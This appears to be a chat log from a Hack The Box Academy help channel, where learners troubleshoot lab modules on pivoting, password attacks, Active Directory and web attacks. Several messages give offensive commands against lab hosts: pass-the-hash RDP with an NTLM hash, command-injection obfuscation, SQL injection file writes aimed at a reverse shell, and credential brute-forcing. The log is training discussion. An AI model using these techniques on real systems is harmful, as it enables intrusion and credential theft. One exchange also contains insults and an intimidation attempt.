I need some help ... Kerberos-Constrained Delegation from Linux. Nothing in this section works on anything -PwnBox, Parrot, nor Kali... reset machines about five times now. This is really a downer.
I get the ST with getST.py just fine and it saves. Export to KRB5CCNAME. Then psexec does not work on anything.
is there an update to the Linux Fundamental Module?
I mean how can I know which section in the Module have been updated ? Because every section in the Module has a green checkmark like I have been completed.
Hi everyone! I have started the Penetration Tester job role path and now I am having a hard time with the section "Pass the Hash" of the Password Attacks module. More specifically in the question "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?", even though I can successfully PtH the administrator's account through impacket, I cannot RDP to the same host using PtH and I am getting a (wrong username or password). I have modified the DisableRestrictedAdmin registry key value under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa as well as HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1, to allow local accounts to perform remote administration. The xfreerdp command I am issuing is: xfreerdp /v:10.129.2.65 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /cert-ignore /timeout:6000
[06:31:18:280] [68675:68676] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:31:18:282] [68675:68675] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
A hint or some help will be more than welcome. Thank you in advance.
└─$ xfreerdp /v:10.129.2.65 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /cert-ignore /timeout:6000 +sec-nla
[06:39:53:938] [72901:72902] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:39:53:940] [72901:72901] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
Module: AD Enum & Attacks
For the past few days xfreerdp doesn't seem to work, but rdesktop works (VPN: US)
Command used : xfreerdp /v:10.129.243.216 /u:htb-student /p:"Academy_student_AD!" /d:inlanefreight.local /cert:ignore +clipboard /dynamic-resolution
just press enter
ohh got confused because some YouTuber mentioned that even though he completed the Bug Bounty Hunter Path, his path completion became 98% or something because there's been an update on some modules. So I thought maybe the newly updated section in the module became non-completed.
lol
@lusty thicket I'm for real I know basics but I need to know more about languages and how to read binary and write binary and I need to find out how to use Python and Linux cuz right now it's confusing me
anyone able to point me in the right direction for 2nd question in **NTLM relay** skills assessment? - BACKUP01 => ||i was able to create a machine account and coerce to get BACKUP01$ ntlmv2 hash and relay it too for q3||, update: done, only last flag now :))
Do the information security foundation Path first
@jolly yacht thank u what's that and where do I find it
Looking it up now thank u so much
Hi all. I'm just working on https://academy.hackthebox.com/module/116/section/1466 - Module: [Attacking Common Services - Easy]
Aside from the fact that the intro offers some insight into the server having SMTP - are we also supposed to be able to tell from our NMAP scans? Because, no matter how I've scanned, SMTP doesn't seem to be showing up. 🤷♂️
```
sudo nmap -Pn -p- 10.129.203.7
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 15:57 GMT
Nmap scan report for inlanefreight.htb (10.129.203.7)
Host is up (0.031s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 156.38 seconds
```
From a troubleshooting perspective have you tried scanning just SMTP to see if you get results? Have you performed any other nmap scans?
Yes, I ran script scans etc., but the issue seems to have been the machine I was given. I terminated the target and spawned another machine (about four times) - last time SMTP shows up and I'm also able to brute-force the service. 😆 Thanks for taking the time to reply!
Yeah no worries. Check a few things and if you are doing things right, it's worth resetting the target.
Hello! Sorry if this is not the right place but where should I ask for help with a retired machine? Thanks!
I can't connect from my vm , i have activated my tun0 openvpn
I tried different requests ||PATCH, PUT, OPTIONS, GET, DELETE, and HEAD state: Missing Parameters POST states: Access Denied||
hey in Windows Attacks & Defense am I the only that cant connect to PKI at 172.16.18.15 via RDP?
It's not up at all
Information Gathering - Web Edition -Skill Assessment question no. 3:
"After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I am not getting any results when crawling either inlanefreight.htb or the subdomain I have found. Used reconspider and finalrecon on both targets and did not get any email. Any hints very appreciated!
Enumerate everything. Apply all the techniques in the module to everything you have found.
Hello I am doing a module but I cannot seem to get the flag
Command Injections: Advanced Command Obfuscation
Just to be clear we need to run the command: find /usr/share/ | grep root | grep mysql | tail -n 1
Right?
Well I did. So I ended up here. Any hints?
That's what the challenge question says, yes
Take a step back and really use every technique. If you find something, start from the beginning and apply every technique to it again. This is how you find what you are looking for
well, i doubt the first two commands would execute correctly due to the parenthesis being missing, i'm going to delete that message though because it kind of reveals a lot
So there is a typo or some? What about the third one if you were able to see it
you have an opening parenthesis but not closing
Any advice? I tried ||HTTP verb tampering but everything other than POST says Missing Parameter||
$(rev<<<'reversed command')
I checked and this was the format of the command I sent here
well i'd keep trying then, but that's not what you posted when you posted the command
Ohhh mb it was typo I was supposed to send the rev one there
just remember the command is going to run on the system as you input it, so if you're reversing the command it's like you typing the command in reverse in the terminal, ie. it won't work. so if you reverse it make sure you reverse the code too
It doesn't reverse symbols like \ doesn't become /
yeah i know
This is just to add on, meant to untag you lol
Ig using reverse string was a bad idea lol
Might be missing one part. You can DM your request.
Think of it like reading the string order backwards
Got the flag haha
yeah like if you type 'ls' into the console, reverse it'd be 'sl'
Like going backwards through an array
Ok, got it. Started all over and finished it now. Thanks
If you change it to ||GET|| you also need to change the parameters to match that format
Does anybody know how can I connect to an instance in the challenges, because when I try to using netcat or ssh it says couldnt resolve host
#challenges read and follow #welcome
whats up with this ldap part: What non-default privilege does the htb-student user have?
there are no privileges that are non-default
that's not true
that doesn't show all the privs
this is one of those things where context matters
whoami /groups
user might inherit non-default privileges through group membership
also might be smart to do "whoami /priv" from an elevated shell
never done this module myself
nah it was a bug in the machine, had to restart it, it didn't give me an elevated shell
Hi all, I'm working on the 'Attacking GitLab' for some hours now. I cannot get the 1st question right "Find another valid user on the target GitLab instance.". I've run the python script with the usernames list under /usr/share/seclists/Usernames/Names (the longest one) and found exactly the same users in the lesson. The field doesn't accept the answer. Puzzled now, can I get any help on this?
try using hydra instead
medusa is a bit finicky and touchy
also don't reveal info for modules above tier 0
i was thinking that ngl i liked hydra cause it was easier(sorry btw about leaking info i tried to hide it but yeah can spoil it for yourself)
just a small question: inside the module I am logging in from inside the thing using ssh, which has medusa installed and its specific password thing, but no curl or sudo.... weird ik, so I can't get hydra on the server, so do I do it from a separate box or something
the username is case sensitive
you're overthinking things
I'm running the other wordlist now, and I already see uppercase ones.. weird
sorry but wdym
password reuse; consider that
consider the subsection <retrieving the flag> in the reading
the question states bruteforcing ssh, then LOGGING IN to the ftp service, NOT brute forcing ftp
yep so when you're in the ssh, but the password that got me into ssh isn't getting me into ftp
playing with the case it's not working... any other tip?
cause you're inside ssh still, cause you're logging in while still inside their server, so you can act as the local host cause you're in the server
did you answer q1?
:)
(you don't have to bruteforce ftp to get q1 btw)
(ftpuser exists as a user in /home/ ... draw conclusions from there)
nope i haven't gotten there lol, i am in using ssh and i looked around a bit cause i have access to cd so i went to the home directory, but i haven't gotten into ftpuser
thanks will try out
listen to me when i tell you: you can get to ftpuser from the outside
so should i brute force using hydra from the outside........ cause the password given earlier in the module doesn't get me in
the first account you crack is for sshuser
not ftpuser
utilize some braincells to connect dots
yep i am in sshuser
i ran out of those sorry, i will try to do more digging before i ask more ig
this is from inside as well using the syntax the module provided from sshuser
btw you may be misinterpreting the medusa output; only the line with [SUCCESS] is the valid pw
so it can absolutely be done from within the ssh session with sshuser
yeah i dont know why i got that other thing the other time, i got the real one now thanks
the 1... entry is for bruteforcing the sshuser... which is their password
make sure you put the right username 
you got ftpuser? :)
any luck?
i find it a minor oversight that they allow you to bruteforce the ftpuser and bypass even looking for sshuser :: eta dropped a post in #1234357888114364508 to maybe see if this is intentional or unavoidable
yeah sorry idk why i got the other password earlier but now i got the flag
Yep, now I'll spray gitlab.. once it's done I'll proceed with the RCE. Thanks!
Hey guys, I'm stuck since a few days on the Windows Event Logs & Finding Evil skills assessment, on the first question on the DLLhijacked; I did a lot of things but can't find anything. First thing that I don't understand is why there is no Event ID 7 in the logs?
sorry i am back but just a quick question: after looking through Login Brute Forcing - Custom Wordlist, am i supposed to follow the example to get in, and if so how do i obtain usernames.txt (that's why i am wondering, this is an example), or do i just brute force like earlier and use hydra and break in
use the example data/info to create the wordlists
Yo guys can someone help me with this one:
From the Pivoting module
The Web Server Pivoting with Rpivot section
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
Using firefox with proxychains the page does not load so I tried using curl, but the flag I see does not get accepted. Could someone check if I have the correct flag or if I am doing something wrong? The flag contains I_L0v3....... I have no spaces in front or after it
try refreshing the page
I tried but the firefox browser does not seem to want to connect
echo 'flag_value' | md5sum
e78870563404e7fbae006e02cf1b1eda
i meant the academy page where you're submitting the answer LOL
Oooh well that also did not work and I have a different hash value
then you didn't copy it fully or you missed something
dm me the flag you retrieved
@bright ridge am I on the right path using /usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt to brute force? it's taking a while :/
rockyou shouldn't generally be used to bruteforce
I've tried others like the ones in /usr/share/seclists/Passwords/Common-Credentials/
the weak passwords mentioned on the section are found on the rockyou-70.txt, that's why I used
if rockyou is meant then it'd be near the top of the file
hmm
the examples won't always match what you expect
vaz gave you a wordlist to try from seclists btw
that one worked to find the user
which should work
but now I need to break the pwd
wait that's for user
hmm ok
kk, will keep looking thanks
read the last section again that last sentence seems like it could be interesting to try
However, if we encounter...
seems like you missed something to try instead of bruteforcing passwords
yeah just ran the section; bruteforcing is a rabbit hole, reading the section again may provide more clarity
ok, I'm exploring the project but don't see any clue, might need to run nmap to find out something else
nope
you're missing the important bit at the end of the last paragraph
something about being able to create your own account 😉
and depending on the version, you may be able to do some funny stuff 😉
yeah, I created an account on the 1st minute.. will explore the other project I see it available
ohhhhhhhhhhhhhhhhhhhhhhhh
I was so biased about the question 1 user account that I missed the basics
got the RCE working now!
I thought too much and missed the obvious thing
the lady in the gif is a well-known artist in my country (Brazil) btw
I'm about to start the Pivoting module, and I've been using Ligolo for some time now. I also know the module doesn't cover Ligolo but instead uses a combination of other tools.
My question is: would I miss anything if I didn't practice those tools and continued using Ligolo throughout the module? For example, is there a feature Ligolo lacks that might be critical in some edge cases?
Renata Sorrah
I actually heard that for CPTS it's best to use Ligolo to save some trouble
always best to know another method when your preferred one doesn't work
and that other method will usually involve proxychains
Any idea why my zap proxy doesn't show hud when it's turned on
Like when I request it doesn't give me the alert box to step and continue
Any idea?
idk
💀
💀
💀
I can't complete Web Requests>GET it says:
The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag
I'm using curl 'http://<IP><PORT>/search.php?search=flag' but nothing
not broken i just did it yesterday. it tells you to use devtools and you're using curl.. try using devtools in the browser to inspect the responses.
yep browser devtools is the first step
ugh nevermind i was thinking about a different section
even still i think this one is a bit interesting i'd have to pull it up to be sure though
you're missing the crucial bit > authentication
actually yeah i got it just now
lmao i used windows too
If you visit the website first you'll see that you have to log in with the provided credentials.. when you do that you get a header you need to include in your curl command
it's even above the question to authenticate, there's even syntax given in the section how to :)
First I did it with devbrowser, later with curl but I didn't get an answer bc I got a "failed to connect"
and even a syntax for an auth bearer token
failed to connect
did it tell you anything about why it failed to connect?
curl: (7) Failed to connect to x port x after 271 ms: Could not connect to server
I did it 2 times... devbrow should give me a header auth?
Can I send you ss? Again failed to connect
is that ip and port up?
i'm assuming you're not literally typing IP:PORT into curl
Yes, I'm using an active target
Done
I was using my VM without the OpenVPN
Sorry for bothering
Hi. I'm working on the File Upload Attacks module, in the Skills Assessment section. Is there any person/user that I can DM to discuss here?
Don't need the vpn for that target
It's a public ip:port, hence why I did it on winders
I was using it with my VM, but I used the pwned & it works
the same command
Hi, I am stuck in Windows Lateral Movement => Windows Remote Management (WinRM) => Question 3 (getting to DC01), could anyone give me some help? DM me please
Hello Guys Someone available to ask about ADCS skill assessment ?
If you are still there, can you send me dm
Hey who can help me reset my Android phone i forgot my Password
Sure you did
I hear putting it on rice helps
Hey if you could help me that'll be awesome
I'm new into these
sure, I'll DM u while I'm crafting my question. Thanks a lot
#rules and no no one here will help you with a shady request
What do you mean by shady question I forgot my own android phone password
No one here is gonna believe it's your phone. If you forgot it, factory reset or take it to a shop
Like how do you forget your own phone password
Besides it's off topic of this chat
I used to use it a long time ago now I found it in my back pack from highschool lol
Am not gonna pay for my phone to get unlocked lol
Cool story, don't care, take it to a shop
we can't help you @swift anchor
Yea alright guys thanks
??? Random racism?
someone should just ban this guy
How is that racist
By assuming what I'm saying and assigning it to a locale for what I can only assume are racially charged reasons
I didn't mean it that way sorry if you were offended
Nah, not offended, more confused than anything
I hope that legitimate question that went deleted was deleted by the author, and not by mistake with all this noise
There was no legit question asked yet
splunk module question a minute ago
What would me being pinoy have to do with anything is my main confusion
Wasn't me
¯\_(ツ)_/¯
Like I said you can't see shit, go fuck yourself with the fake scare bullshit
Hi, I am working on a question in the Hunting Evil with Sigma (Splunk Edition), but the generated query does not seem to show any results. Has anyone faced this problem?
<@&861185840277487616> failing terribly at trying to scare me, it's not even funny
U don't use webcam xD
Nah it's just funny he thought I was some kid who'd get easily scared by someone claiming to have webcam access
hey @fathom pendant can I DM ?
No
I don't give him more than 12 years
ok, I'll say it in public then. I don't think this (what I'm replying to) helps. It's not the first time either. As much as I don't appreciate these people either, I don't think it's necessary to go down to that level, and I don't see how that's not against the rules either. Especially with that badge. I'm not the police, but I'll give feedback about it, just wanted to tell you first.
What level was i stooping to? Most I did was call it as I see it, them being a dumb shit.
They turned around and for whatever reason tried to push a race on me? Which mostly confused me
Btw if you actually told me what you wanted to dm about I'd have said sure
But if it's a random "can I DM" without prior conversational context, it's a no
that's fair enough. Could have also asked, but I get it
Also, what on earth happened, I'd read back.. but meetings starting 
👍
👀
Tl;dr kid came in asking about unlocking "their" old phone for them bc they forgot the password
Got told to fuck off and go to a shop bc that sounds shady af
Somehow turned into them calling me Filipino, and claiming to have camera access to scare me
Just another day
Well yeah wasn't focusing on the race part, that's just.. what
More the webcam thing, but yeah. Inappropriate all the way. Thanks for pinging
Yeah ❤️
SQL comments require a space after, iirc
Yes that's right, I have used a space
Wait sorry now I haven’t used two dashes
I don't think it can be directly attached to the value
What do you mean?
Instead of 6- 6 -
check that your input is not being transformed. When I use your copy-paste it's clear that the two dashes became a... long dash, however that's called. I thought it was discord but I get the same error you're getting if I copy paste, and it works with double dashes as expected
hi, I need help with the sumk machine (chemistry)
I responded to you 5 min ago in #bot-commands - please do not cross post
Oh I see.
nothing wrong with either of those queries, but I'd re-read the question :)
... It was id = 5 the whole time hahah
Deleting bc spoilers, iirc SQL is T1
It's tier 0 but sure
nono you're good it's still a spoiler
why it now working in CLI?
https://academy.hackthebox.com/module/24/section/160 at smb upload
Hi @fathom pendant, I told you a few days ago about what I wanted to DM you about (some advice) but I don't think you saw it 😅
Hey. I'm in the SQL Injection Fundamentals module at the Skills Assessment module.
Well I achieved sql injection in every kind of way, I found that I am on user root which is a superuser, I need to get a shell and locate a flag in the root directory.
However, when trying to write files in order to get reverse shell, I get an error that I have no permissions to write
"Can't create/write to file '/var/www/html/proof.txt' (Errcode: 13 "Permission denied")"
Maybe write to the directory you're in
oh
Thanks. that worked. Is there any reason it had to be there?
if by "I am on user root which is a superuser" you mean you are root@localhost on the db, note that those are not necessarily the same thing. That might be what you found
the SQLMap module notes this at some point, you'll see it soon
Yes I meant user root on the mysql client
it was just about going through your journey basically and how you got to where you are. What are the best steps for me and how can I improve/replicate? basically a back and forth on that 😅
That'll be a blog for when I get around to it
ok cool, please keep me updated 🙂
I just wanted to register more or less the section I'm stuck on: it's on the CWEE path, Header Attacks.
The lab says I can only access admin "locally" and I need to spoof the Host header. The section lists 10 improbable values to be on a blacklist that are also interpreted as 127.0.0.1, like 127.1 or ::1. Even using all the payloads I still can't solve the challenge.
Please, person of the future who sees this, help me lol (free to DM)
[EDIT POST-SOLVING]: Try to think of different things than the list provided, the section is really misleading, it's much simpler than the ideas in the section
what module is this
Abusing HTTP Misconfigurations
section?
Bypassing Flawed Validation
dm me
SOLVED! thanks to this really nice person
Who do you contact regarding inconsistencies with the modules?
I'm having a few issues after following the module and I'm always coming here and everyone seems to have the same problems
just by curiosity, what kind of inconsistencies?
Currently working through the 'Pivoting, Tunneling, and Port Forwarding' module, followed everything and some things didn't show up on a scan compared to the screenshots provided.
Previously I was stuck on a BitLocker task which I was unsure on mounting through Linux, nothing was in the module. Once complete, the next module then told you how to do it.
There's an entire page on SQL and the lab at the end involves an entirely different command to what was shown
I understand that it's a learning curve, but when the course material doesn't help it kind of defeats the point.
If you are scanning a specific host (subnet) through a socks proxy within the workstation, try adding sudo before the proxychains command
I understand this, and I knew what I was getting into, but when I'm copying something word for word and it doesn't work it can get tedious
This was the exact issue, I only knew i could do what was done because the question guides you. But wanted to put what i learnt into the scenario
without just doing proxychains xfreerdp
Hello, I have a question on Login-BruteForcing - Web, Services, when I am trying to nmap the target, there is no FTP service, but I need to find the password of ftpuser - What was the password for the ftpuser??
as rat says, you cannot copy and paste your way to certified
Some things will not work as shown, and it is a real part of pentesting. You have to do some external research in order to get what you want
no. please leave the server if you are here for less than ethical purposes
hey, I am stuck, or rather don't even have access, just bruteforcing FTP and SSH on the skill assessment of Password Attacks: "Examine the first target and submit the root password as the answer." Can I get a hint bcz it's been 3h
You are given a specific port with your target IP address that you are supposed to use. Services can be hosted on ports that are not the default port for that service.
so I should try another specific one, ok, understood, will do that
I would also suggest trying to identify the service being hosted on that port, i.e., banner grab or something, as you may need to target something else to get to the end goal.
I'm doing the Pivoting module, first ever lab, and proxychains is not working.
```
ssh -D 9050 ubuntu@10.129.61.160
```
```
socks4 127.0.0.1 9050
```
```
ubuntu@WEB01:~$ ping 172.16.5.19
PING 172.16.5.19 (172.16.5.19) 56(84) bytes of data.
64 bytes from 172.16.5.19: icmp_seq=1 ttl=128 time=0.720 ms
```
```
proxychains nmap -Pn -sT -p 3389 172.16.5.19
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 07:50 CST
Nmap scan report for 172.16.5.19
Host is up.
PORT STATE SERVICE
3389/tcp filtered ms-wbt-server
```
Looks fine to me?
Well I couldn't reach the port from my Pwnbox. I tried the nmap scan with sudo, and it shows open:
```
➜ ~ sudo proxychains nmap -Pn -sT -p 3389 172.16.5.19
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 08:01 CST
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.19:3389 ... OK
Nmap scan report for 172.16.5.19
Host is up (0.010s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
Yeah I totally get that, but this is material on how to do something it’s not as if it’s black box testing
nah, I can't find it. Anyway, I gave nmap the parameters -p- and -sV and there are only HTTP Apache and Nginx, MySQL and HTTP services, with SSH
The section is sort of a walk through, so I would just review the process and see if you can repeat it.
ok
What port did it give your target IP?
Yo
@everyone hello, I am stuck in the JavaScript Deobfuscation module in the HTTP request part. I got an answer but it is incorrect. I also verified the answer walkthrough.
Hi, could I DM someone for a sanity check for API Attacks, Skills Assessment?
you can dm me.
Attacking Common Services - Easy
hello folks, what's up... can somebody tell me if they also have this issue sometimes with some machines, why I cannot scan the ports?
```
nmap -sC -sV 10.129.11.127
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 09:42 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.47 seconds
┌──(kali㉿kali)-[~/Vpn]
└─$ nmap -sT 10.129.11.127
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 09:43 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.16 seconds
┌──(kali㉿kali)-[~/Vpn]
└─$ nmap -sT 10.129.11.127 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 09:43 EST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 67.50% done; ETC: 09:47 (0:01:06 remaining)
Nmap scan report for 10.129.11.127
Host is up.
All 1000 scanned ports on 10.129.11.127 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 215.03 seconds
```
Gonna sound dumb but are you connected to the vpn or have multiple connections open?
I have my own VPN which I am always connected to on the internet, and then from the VM the VPN from HTB
I have this issue more often
well, considering your setup, not sure how to help with that ¯\_(ツ)_/¯
there are many 5-digit ports, like
```
54854/tcp open http Apache httpd 2.4.41 ((Ubuntu))
55047/tcp open http Apache httpd 2.4.41 ((Ubuntu))
55208/tcp open http nginx 1.19.2
55249/tcp open http nginx 1.19.2
55424/tcp open http Apache httpd 2.4.41 ((Ubuntu))
```
Hello; I got an error like `NameError: name 'smb_share_name' is not defined` while I was running `crackmapexec ldap 10.129.191.62 -u grace -p Inlanefreight01! --asreproast asreproast.out`. Do you know what could be the reason?
Fixed! I ran `nxc ldap 10.129.191.62 -u grace -p Inlanefreight01! --asreproast output.txt` and it worked successfully
thanks
You don't scan the public IP, -100 points from Gryffindor
The target port is the only port you need to target.
94.237.49.130:51058